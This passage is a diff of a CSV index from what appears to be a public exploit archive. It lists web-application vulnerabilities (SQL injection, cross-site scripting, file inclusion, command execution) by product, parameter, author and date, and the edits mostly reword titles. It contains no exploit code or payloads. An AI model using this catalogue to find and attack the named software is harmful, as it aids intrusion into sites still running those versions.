Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0 32422,platforms/php/webapps/32422.txt,"Vikingboard 0.2 Beta - 'register.php' SQL Column Truncation Unauthorized Access",2008-09-25,StAkeR,php,webapps,0 -32423,platforms/jsp/webapps/32423.txt,"OpenNMS 1.5.x - 'j_username' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 -32424,platforms/jsp/webapps/32424.txt,"OpenNMS 1.5.x - 'Username' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 -32425,platforms/jsp/webapps/32425.txt,"OpenNMS 1.5.x - 'filter' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 +32423,platforms/jsp/webapps/32423.txt,"OpenNMS 1.5.x - 'j_username' Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 +32424,platforms/jsp/webapps/32424.txt,"OpenNMS 1.5.x - 'Username' Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 +32425,platforms/jsp/webapps/32425.txt,"OpenNMS 1.5.x - 'filter' Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 32427,platforms/php/webapps/32427.txt,"Barcode Generator 2.0 - 'LSTable.php' Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0 32430,platforms/cgi/webapps/32430.txt,"WhoDomLite 1.1.3 - 'wholite.cgi' Cross-Site Scripting",2008-09-27,"Ghost Hacker",cgi,webapps,0 32431,platforms/php/webapps/32431.txt,"Lyrics Script - 'search_results.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",php,webapps,0 @@ -33134,34 +33135,34 @@ id,file,description,date,author,platform,type,port 32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 - Cookie Authentication Bypass",2008-09-29,Crackers_Child,php,webapps,0 32443,platforms/php/webapps/32443.txt,"CAcert - 'analyse.php' Cross-Site Scripting",2008-09-29,"Alexander Klink",php,webapps,0 32444,platforms/php/webapps/32444.txt,"WordPress MU 1.2/1.3 - 'wp-admin/wpmu-blogs.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",php,webapps,0 -32447,platforms/php/webapps/32447.txt,"A4Desk Event Calendar - 'v' Parameter Remote File Inclusion",2008-09-30,Lo$er,php,webapps,0 +32447,platforms/php/webapps/32447.txt,"A4Desk Event Calendar - 'v' Remote File Inclusion",2008-09-30,Lo$er,php,webapps,0 32448,platforms/java/webapps/32448.txt,"Celoxis - Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,teuquooch1seero,java,webapps,0 32449,platforms/php/webapps/32449.txt,"H-Sphere WebShell 4.3.10 - 'actions.php' Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,C1c4Tr1Z,php,webapps,0 32450,platforms/php/webapps/32450.txt,"WikyBlog 1.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,"Omer Singer",php,webapps,0 32453,platforms/php/webapps/32453.txt,"Dreamcost HostAdmin 3.1 - 'index.php' Cross-Site Scripting",2008-10-02,Am!r,php,webapps,0 32455,platforms/php/webapps/32455.pl,"Website Directory - 'index.php' Cross-Site Scripting",2008-10-03,"Ghost Hacker",php,webapps,0 -32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Parameter Cross-Site Scripting",2008-10-05,"Mazin Faour",java,webapps,0 +32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Cross-Site Scripting",2008-10-05,"Mazin Faour",java,webapps,0 32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps,0 32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - 'POST' Filter Security Bypass",2008-10-06,WHK,php,webapps,0 -32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 +32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - 'main.php?refer' Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - 'edit.php' File Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0 -32468,platforms/php/webapps/32468.txt,"DFFFrameworkAPI - 'DFF_config[dir_include]' Parameter Multiple Remote File Inclusion",2008-10-08,GoLd_M,php,webapps,0 -32473,platforms/php/webapps/32473.txt,"Joomla! Component com_jeux - 'id' Parameter SQL Injection",2008-10-11,H!tm@N,php,webapps,0 +32468,platforms/php/webapps/32468.txt,"DFFFrameworkAPI - 'DFF_config[dir_include]' Multiple Remote File Inclusions",2008-10-08,GoLd_M,php,webapps,0 +32473,platforms/php/webapps/32473.txt,"Joomla! Component com_jeux - 'id' SQL Injection",2008-10-11,H!tm@N,php,webapps,0 32474,platforms/php/webapps/32474.txt,"EEB-CMS 0.95 - 'index.php' Cross-Site Scripting",2008-10-11,d3v1l,php,webapps,0 32479,platforms/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary File Upload",2014-03-24,"felipe andrian",php,webapps,0 32520,platforms/php/webapps/32520.txt,"OpenCart 1.5.6.1 - 'openbay' Multiple SQL Injections",2014-03-26,"Saadi Siddiqui",php,webapps,0 32563,platforms/php/webapps/32563.txt,"YourFreeWorld Downline Builder Pro - 'tr.php' SQL Injection",2008-11-02,"Hussin X",php,webapps,0 32485,platforms/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi - 'xurunler.asp' SQL Injection",2008-10-13,tRoot,asp,webapps,0 32486,platforms/php/webapps/32486.txt,"Webscene eCommerce - 'productlist.php' SQL Injection",2008-10-14,"Angela Chang",php,webapps,0 -32487,platforms/php/webapps/32487.txt,"Elxis CMS 2008.1 - modules/mod_language.php Multiple Parameter Cross-Site Scripting",2008-10-14,faithlove,php,webapps,0 +32487,platforms/php/webapps/32487.txt,"Elxis CMS 2008.1 - 'modules/mod_language.php' Multiple Cross-Site Scripting Vulnerabilities",2008-10-14,faithlove,php,webapps,0 32488,platforms/php/webapps/32488.txt,"Elxis CMS 2008.1 - PHPSESSID Variable Session Fixation",2008-10-14,faithlove,php,webapps,0 32490,platforms/php/webapps/32490.txt,"SweetCMS 1.5.2 - 'index.php' SQL Injection",2008-10-14,Dapirates,php,webapps,0 -32492,platforms/php/webapps/32492.txt,"Habari 0.5.1 - 'habari_username' Parameter Cross-Site Scripting",2008-10-16,faithlove,php,webapps,0 +32492,platforms/php/webapps/32492.txt,"Habari 0.5.1 - 'habari_username' Cross-Site Scripting",2008-10-16,faithlove,php,webapps,0 32494,platforms/php/webapps/32494.txt,"FlashChat - 'connection.php' Role Filter Security Bypass",2008-10-17,eLiSiA,php,webapps,0 -32495,platforms/php/webapps/32495.txt,"Jetbox CMS 2.1 - admin/cms/images.php orderby Parameter SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 -32496,platforms/php/webapps/32496.txt,"Jetbox CMS 2.1 - admin/cms/nav.php nav_id Parameter SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 -32497,platforms/php/webapps/32497.txt,"PHP-Nuke Sarkilar Module - 'id' Parameter SQL Injection",2008-10-20,r45c4l,php,webapps,0 +32495,platforms/php/webapps/32495.txt,"Jetbox CMS 2.1 - 'admin/cms/images.php?orderby' SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 +32496,platforms/php/webapps/32496.txt,"Jetbox CMS 2.1 - 'admin/cms/nav.php?nav_id' SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 +32497,platforms/php/webapps/32497.txt,"PHP-Nuke Sarkilar Module - 'id' SQL Injection",2008-10-20,r45c4l,php,webapps,0 32498,platforms/asp/webapps/32498.txt,"Dizi Portali - 'diziler.asp' SQL Injection",2008-10-21,"CyberGrup Lojistik",asp,webapps,0 32499,platforms/php/webapps/32499.txt,"PHPhotoGallery 0.92 - 'index.php' SQL Injection",2008-10-21,KnocKout,php,webapps,0 32500,platforms/asp/webapps/32500.txt,"Bahar Download Script 2.0 - 'aspkat.asp' SQL Injection",2008-10-21,"CyberGrup Lojistik",asp,webapps,0 @@ -33175,21 +33176,21 @@ id,file,description,date,author,platform,type,port 32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 - Database Backup Disclosure",2014-03-25,LiquidWorm,php,webapps,0 32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 - (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80 -32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - 'xhr.php i' Parameter SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 -32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 - 'ListRecords.php' Multiple Remote File Inclusion",2008-10-23,BoZKuRTSeRDaR,php,webapps,0 +32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - 'xhr.php?i' SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 +32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 - 'ListRecords.php' Multiple Remote File Inclusions",2008-10-23,BoZKuRTSeRDaR,php,webapps,0 32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 - 'api.php' URI redirection",2008-10-23,xuanmumu,php,webapps,0 32524,platforms/php/webapps/32524.txt,"UC Gateway Investment SiteEngine 5.0 - 'announcements.php' SQL Injection",2008-10-23,xuanmumu,php,webapps,0 -32525,platforms/php/webapps/32525.txt,"Jetbox CMS 2.1 - 'liste' Parameter Cross-Site Scripting",2008-10-23,"Omer Singer",php,webapps,0 +32525,platforms/php/webapps/32525.txt,"Jetbox CMS 2.1 - 'liste' Cross-Site Scripting",2008-10-23,"Omer Singer",php,webapps,0 32526,platforms/php/webapps/32526.txt,"ClipShare Pro 4.0 - 'fullscreen.php' Cross-Site Scripting",2008-10-23,ShockShadow,php,webapps,0 32527,platforms/php/webapps/32527.txt,"Adam Wright HTMLTidy 0.5 - 'html-tidy-logic.php' Cross-Site Scripting",2008-10-23,ShockShadow,php,webapps,0 -32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 - 'pg' Parameter Cross-Site Scripting",2008-10-24,"Ghost Hacker",php,webapps,0 +32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 - 'pg' Cross-Site Scripting",2008-10-24,"Ghost Hacker",php,webapps,0 32531,platforms/php/webapps/32531.txt,"phpMyAdmin 3.0.1 - 'pmd_pdf.php' Cross-Site Scripting",2008-10-27,"Hadi Kiamarsi",php,webapps,0 32532,platforms/php/webapps/32532.txt,"bcoos 1.0.13 - 'common.php' Remote File Inclusion",2008-10-27,Cru3l.b0y,php,webapps,0 32533,platforms/php/webapps/32533.txt,"Tandis CMS 2.5 - 'index.php' Multiple SQL Injections",2008-10-27,G4N0K,php,webapps,0 32535,platforms/php/webapps/32535.txt,"MyBB 1.4.2 - 'moderation.php' Cross-Site Scripting",2008-10-27,Kellanved,php,webapps,0 32536,platforms/php/webapps/32536.txt,"bcoos 1.0.13 - 'click.php' SQL Injection",2008-10-27,DeltahackingTEAM,php,webapps,0 32537,platforms/php/webapps/32537.txt,"All In One 1.4 Control Panel - 'cp_polls_results.php' SQL Injection",2008-10-27,ExSploiters,php,webapps,0 -32538,platforms/php/webapps/32538.txt,"PHP-Nuke Nuke League Module - 'tid' Parameter Cross-Site Scripting",2008-10-28,Ehsan_Hp200,php,webapps,0 +32538,platforms/php/webapps/32538.txt,"PHP-Nuke Nuke League Module - 'tid' Cross-Site Scripting",2008-10-28,Ehsan_Hp200,php,webapps,0 32539,platforms/php/webapps/32539.html,"Microsoft Internet Explorer 6 - '&NBSP;' Address Bar URI Spoofing",2008-10-27,"Amit Klein",php,webapps,0 32540,platforms/php/webapps/32540.pl,"H2O-CMS 3.4 - PHP Code Injection / Cookie Authentication Bypass Vulnerabilities",2008-10-28,StAkeR,php,webapps,0 32541,platforms/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 - 'id' SQL Injection",2008-10-28,d3v1l,php,webapps,0 @@ -33212,7 +33213,7 @@ id,file,description,date,author,platform,type,port 32566,platforms/php/webapps/32566.txt,"firmCHANNEL Indoor & Outdoor Digital Signage 3.24 - Cross-Site Scripting",2008-11-04,"Brad Antoniewicz",php,webapps,0 32567,platforms/php/webapps/32567.txt,"DHCart 3.84 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2008-11-04,Lostmon,php,webapps,0 32569,platforms/ios/webapps/32569.txt,"iStArtApp FileXChange 6.2 iOS - Multiple Vulnerabilities",2014-03-28,Vulnerability-Lab,ios,webapps,8888 -32570,platforms/php/webapps/32570.txt,"CuteNews aj-fork - 'path' Parameter Remote File Inclusion",2008-11-06,DeltahackingTEAM,php,webapps,0 +32570,platforms/php/webapps/32570.txt,"CuteNews aj-fork - 'path' Remote File Inclusion",2008-11-06,DeltahackingTEAM,php,webapps,0 32571,platforms/php/webapps/32571.txt,"TurnkeyForms Software Directory 1.0 - SQL Injection / Cross-Site Scripting",2008-11-07,G4N0K,php,webapps,0 32574,platforms/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",java,webapps,0 32575,platforms/php/webapps/32575.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass (2)",2008-11-08,G4N0K,php,webapps,0 @@ -33220,60 +33221,60 @@ id,file,description,date,author,platform,type,port 32577,platforms/asp/webapps/32577.txt,"Dizi Portali - 'film.asp' SQL Injection",2008-11-10,"Kaan KAMIS",asp,webapps,0 32579,platforms/jsp/webapps/32579.html,"Sun Java System Identity Manager 6.0/7.x - Multiple Vulnerabilities",2008-11-11,"Richard Brain",jsp,webapps,0 32580,platforms/asp/webapps/32580.txt,"ASP-Nuke 2.0.7 - 'gotourl.asp' Open Redirect",2014-03-29,"felipe andrian",asp,webapps,0 -32588,platforms/php/webapps/32588.txt,"BoutikOne CMS - 'search_query' Parameter Cross-Site Scripting",2008-11-17,d3v1l,php,webapps,0 -32589,platforms/php/webapps/32589.html,"Kimson CMS - 'id' Parameter Cross-Site Scripting",2008-11-18,md.r00t,php,webapps,0 -32592,platforms/php/webapps/32592.txt,"Easyedit CMS - subcategory.php intSubCategoryID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 +32588,platforms/php/webapps/32588.txt,"BoutikOne CMS - 'search_query' Cross-Site Scripting",2008-11-17,d3v1l,php,webapps,0 +32589,platforms/php/webapps/32589.html,"Kimson CMS - 'id' Cross-Site Scripting",2008-11-18,md.r00t,php,webapps,0 +32592,platforms/php/webapps/32592.txt,"Easyedit CMS - 'subcategory.php?intSubCategoryID' SQL Injection",2008-11-19,d3v1l,php,webapps,0 32593,platforms/php/webapps/32593.txt,"Easyedit CMS - 'page.php' intPageID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 -32594,platforms/php/webapps/32594.txt,"Easyedit CMS - news.php intPageID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 +32594,platforms/php/webapps/32594.txt,"Easyedit CMS - 'news.php?intPageID' SQL Injection",2008-11-19,d3v1l,php,webapps,0 32595,platforms/php/webapps/32595.txt,"Softbiz Classifieds Script - Cross-Site Scripting",2008-11-20,"Vahid Ezraeil",php,webapps,0 32597,platforms/php/webapps/32597.txt,"Pilot Group PG Roommate Finder Solution - SQL Injection",2008-11-23,ZoRLu,php,webapps,0 32598,platforms/php/webapps/32598.txt,"COms - 'dynamic.php' Cross-Site Scripting",2008-11-24,Pouya_Server,php,webapps,0 -32600,platforms/php/webapps/32600.txt,"AssoCIateD 1.4.4 - 'menu' Parameter Cross-Site Scripting",2008-11-27,"CWH Underground",php,webapps,0 -32601,platforms/asp/webapps/32601.txt,"Ocean12 FAQ Manager Pro - 'Keyword' Parameter Cross-Site Scripting",2008-11-29,"Charalambous Glafkos",asp,webapps,0 -32602,platforms/asp/webapps/32602.txt,"Multiple Ocean12 Products - 'Admin_ID' Parameter SQL Injection",2008-11-29,"Charalambous Glafkos",asp,webapps,0 -32603,platforms/asp/webapps/32603.txt,"Ocean12 Mailing LisManager Gold 2.04 - 'Email' Parameter SQL Injection",2008-11-29,"Charalambous Glafkos",asp,webapps,0 +32600,platforms/php/webapps/32600.txt,"AssoCIateD 1.4.4 - 'menu' Cross-Site Scripting",2008-11-27,"CWH Underground",php,webapps,0 +32601,platforms/asp/webapps/32601.txt,"Ocean12 FAQ Manager Pro - 'Keyword' Cross-Site Scripting",2008-11-29,"Charalambous Glafkos",asp,webapps,0 +32602,platforms/asp/webapps/32602.txt,"Ocean12 (Multiple Products) - 'Admin_ID' SQL Injection",2008-11-29,"Charalambous Glafkos",asp,webapps,0 +32603,platforms/asp/webapps/32603.txt,"Ocean12 Mailing LisManager Gold 2.04 - 'Email' SQL Injection",2008-11-29,"Charalambous Glafkos",asp,webapps,0 32604,platforms/asp/webapps/32604.txt,"ParsBlogger - 'blog.asp' Cross-Site Scripting",2008-11-29,Pouya_Server,asp,webapps,0 32605,platforms/php/webapps/32605.txt,"Venalsur Booking Centre 2.01 - Multiple Cross-Site Scripting Vulnerabilities",2008-11-29,Pouya_Server,php,webapps,0 -32606,platforms/php/webapps/32606.txt,"Basic-CMS - 'q' Parameter Cross-Site Scripting",2008-11-29,Pouya_Server,php,webapps,0 -32607,platforms/php/webapps/32607.txt,"RakhiSoftware Shopping Cart - product.php Multiple Parameter Cross-Site Scripting",2008-11-28,"Charalambous Glafkos",php,webapps,0 +32606,platforms/php/webapps/32606.txt,"Basic-CMS - 'q' Cross-Site Scripting",2008-11-29,Pouya_Server,php,webapps,0 +32607,platforms/php/webapps/32607.txt,"RakhiSoftware Shopping Cart - 'product.php' Multiple Cross-Site Scripting Vulnerabilities",2008-11-28,"Charalambous Glafkos",php,webapps,0 32608,platforms/php/webapps/32608.txt,"RakhiSoftware Shopping Cart - PHPSESSID Cookie Manipulation Full Path Disclosure",2008-11-28,"Charalambous Glafkos",php,webapps,0 32609,platforms/asp/webapps/32609.txt,"Pre Classified Listings 1.0 - 'detailad.asp' SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0 32610,platforms/asp/webapps/32610.txt,"Pre Classified Listings 1.0 - 'signup.asp' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 32611,platforms/asp/webapps/32611.txt,"CodeToad ASP Shopping Cart Script - Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 -32612,platforms/php/webapps/32612.txt,"Softbiz Classifieds Script - showcategory.php radio Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 -32613,platforms/php/webapps/32613.txt,"Softbiz Classifieds Script - advertisers/signinform.php msg Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 -32614,platforms/php/webapps/32614.txt,"Softbiz Classifieds Script - gallery.php radio Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 -32615,platforms/php/webapps/32615.txt,"Softbiz Classifieds Script - lostpassword.php msg Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 -32616,platforms/php/webapps/32616.txt,"Softbiz Classifieds Script - admin/adminhome.php msg Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 -32617,platforms/php/webapps/32617.txt,"Softbiz Classifieds Script - admin/index.php msg Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 +32612,platforms/php/webapps/32612.txt,"Softbiz Classifieds Script - 'showcategory.php?radio' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 +32613,platforms/php/webapps/32613.txt,"Softbiz Classifieds Script - 'advertisers/signinform.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 +32614,platforms/php/webapps/32614.txt,"Softbiz Classifieds Script - 'gallery.php?radio' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 +32615,platforms/php/webapps/32615.txt,"Softbiz Classifieds Script - 'lostpassword.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 +32616,platforms/php/webapps/32616.txt,"Softbiz Classifieds Script - 'admin/adminhome.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 +32617,platforms/php/webapps/32617.txt,"Softbiz Classifieds Script - 'admin/index.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 32619,platforms/ios/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,52789 32620,platforms/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,8080 32622,platforms/php/webapps/32622.txt,"WordPress Plugin Ajax Pagination 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80 32623,platforms/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read (Metasploit)",2014-03-31,"Brandon Perry",multiple,webapps,0 -32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO - 'adname' Parameter SQL Injection",2008-12-01,Pouya_Server,php,webapps,0 +32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO - 'adname' SQL Injection",2008-12-01,Pouya_Server,php,webapps,0 32625,platforms/php/webapps/32625.txt,"PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 -32626,platforms/asp/webapps/32626.txt,"ASP Forum Script - messages.asp message_id Parameter SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0 -32627,platforms/php/webapps/32627.txt,"ASP Forum Script - new_message.asp forum_id Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 -32628,platforms/asp/webapps/32628.txt,"ASP Forum Script - messages.asp forum_id Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 +32626,platforms/asp/webapps/32626.txt,"ASP Forum Script - 'messages.asp?message_id' SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0 +32627,platforms/php/webapps/32627.txt,"ASP Forum Script - 'new_message.asp?forum_id' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 +32628,platforms/asp/webapps/32628.txt,"ASP Forum Script - 'messages.asp?forum_id' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 32629,platforms/asp/webapps/32629.txt,"ASP Forum Script - default.asp Query String Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 32630,platforms/asp/webapps/32630.txt,"Pre ASP Job Board - 'emp_login.asp' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 32631,platforms/multiple/webapps/32631.txt,"IBM Rational ClearCase 7/8 - Cross-Site Scripting",2008-12-01,IBM,multiple,webapps,0 32632,platforms/php/webapps/32632.php,"Fantastico - 'index.php' Local File Inclusion",2008-12-02,Super-Crystal,php,webapps,0 -32633,platforms/php/webapps/32633.txt,"Z1Exchange 1.0 - 'id' Parameter SQL Injection",2008-12-02,Pouya_Server,php,webapps,0 -32634,platforms/php/webapps/32634.txt,"Z1Exchange 1.0 - 'id' Parameter Cross-Site Scripting",2008-12-02,Pouya_Server,php,webapps,0 +32633,platforms/php/webapps/32633.txt,"Z1Exchange 1.0 - 'id' SQL Injection",2008-12-02,Pouya_Server,php,webapps,0 +32634,platforms/php/webapps/32634.txt,"Z1Exchange 1.0 - 'id' Cross-Site Scripting",2008-12-02,Pouya_Server,php,webapps,0 32635,platforms/asp/webapps/32635.txt,"Jbook - SQL Injection",2008-12-02,Pouya_Server,asp,webapps,0 -32636,platforms/php/webapps/32636.txt,"Orkut Clone - profile_social.php id Parameter SQL Injection",2008-12-02,d3b4g,php,webapps,0 -32637,platforms/php/webapps/32637.txt,"Orkut Clone - profile_social.php id Parameter Cross-Site Scripting",2008-12-02,d3b4g,php,webapps,0 +32636,platforms/php/webapps/32636.txt,"Orkut Clone - 'profile_social.php?id' SQL Injection",2008-12-02,d3b4g,php,webapps,0 +32637,platforms/php/webapps/32637.txt,"Orkut Clone - 'profile_social.php?id' Cross-Site Scripting",2008-12-02,d3b4g,php,webapps,0 32638,platforms/php/webapps/32638.txt,"Horde Webmail 5.1 - Open Redirect",2014-04-01,"felipe andrian",php,webapps,0 32639,platforms/php/webapps/32639.txt,"Yappa-ng - 'index.php' album Parameter Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0 32640,platforms/php/webapps/32640.txt,"Yappa-ng - Query String Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0 32641,platforms/php/webapps/32641.txt,"RevSense 1.0 - SQL Injection / Cross-Site Scripting",2008-12-04,Pouya_Server,php,webapps,0 32642,platforms/php/webapps/32642.txt,"PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection",2008-12-04,"CWH Underground",php,webapps,0 32644,platforms/php/webapps/32644.txt,"Alienvault 4.5.0 - Authenticated SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",php,webapps,443 -32645,platforms/php/webapps/32645.txt,"TWiki 4.x - 'SEARCH' Parameter Remote Command Execution",2008-12-06,"Troy Bollinge",php,webapps,0 -32646,platforms/php/webapps/32646.txt,"TWiki 4.x - 'URLPARAM' Parameter Cross-Site Scripting",2008-12-06,"Marc Schoenefeld",php,webapps,0 -32647,platforms/php/webapps/32647.txt,"PrestaShop 1.1 - admin/login.php PATH_INFO Parameter Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 -32648,platforms/php/webapps/32648.txt,"PrestaShop 1.1 - order.php PATH_INFO Parameter Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 +32645,platforms/php/webapps/32645.txt,"TWiki 4.x - 'SEARCH' Remote Command Execution",2008-12-06,"Troy Bollinge",php,webapps,0 +32646,platforms/php/webapps/32646.txt,"TWiki 4.x - 'URLPARAM' Cross-Site Scripting",2008-12-06,"Marc Schoenefeld",php,webapps,0 +32647,platforms/php/webapps/32647.txt,"PrestaShop 1.1 - 'admin/login.php?PATH_INFO' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 +32648,platforms/php/webapps/32648.txt,"PrestaShop 1.1 - 'order.php?PATH_INFO' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32649,platforms/php/webapps/32649.txt,"PHPepperShop 1.4 - 'index.php' URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32650,platforms/php/webapps/32650.txt,"PHPepperShop 1.4 - shop/kontakt.php URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32651,platforms/php/webapps/32651.txt,"PHPepperShop 1.4 - shop/Admin/shop_kunden_mgmt.php URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 @@ -33281,7 +33282,7 @@ id,file,description,date,author,platform,type,port 32653,platforms/asp/webapps/32653.txt,"Professional Download Assistant 0.1 - SQL Injection",2008-12-09,ZoRLu,asp,webapps,0 32655,platforms/jsp/webapps/32655.txt,"Multiple Ad Server Solutions Products - 'logon_processing.jsp' SQL Injection",2008-12-11,"3d D3v!L",jsp,webapps,0 32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 - Multiple SQL Injections",2008-12-01,"security curmudgeon",php,webapps,0 -32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary - 'cat' Parameter SQL Injection",2008-12-13,Pouya_Server,asp,webapps,0 +32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary - 'cat' SQL Injection",2008-12-13,Pouya_Server,asp,webapps,0 32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0 32662,platforms/php/webapps/32662.py,"WebPhotoPro - Multiple SQL Injections",2008-12-14,baltazar,php,webapps,0 32663,platforms/php/webapps/32663.txt,"Injader 2.1.1 - SQL Injection / HTML Injection",2008-12-15,anonymous,php,webapps,0 @@ -33292,7 +33293,7 @@ id,file,description,date,author,platform,type,port 32668,platforms/php/webapps/32668.txt,"CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities",2014-04-03,"Blessen Thomas",php,webapps,0 32669,platforms/php/webapps/32669.txt,"PHPcksec 0.2 - 'PHPcksec.php' Cross-Site Scripting",2008-12-17,ahmadbady,php,webapps,0 32670,platforms/php/webapps/32670.txt,"Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0) - Unvalidated Redirects",2014-04-03,"Giuseppe D'Amore",php,webapps,0 -32671,platforms/php/webapps/32671.txt,"DO-CMS 3.0 - 'p' Parameter Multiple SQL Injections",2008-12-18,"crash over",php,webapps,0 +32671,platforms/php/webapps/32671.txt,"DO-CMS 3.0 - 'p' Multiple SQL Injections",2008-12-18,"crash over",php,webapps,0 32672,platforms/php/webapps/32672.txt,"Easysitenetwork Jokes Complete Website - 'joke.php' SQL Injection",2008-12-18,Ehsan_Hp200,php,webapps,0 32676,platforms/php/webapps/32676.txt,"PECL Alternative PHP Cache Local 3 - HTML Injection",2008-12-19,"Moritz Naumann",php,webapps,0 32677,platforms/jsp/webapps/32677.txt,"Openfire 3.6.2 - 'group-summary.jsp' Cross-Site Scripting",2009-01-08,"Federico 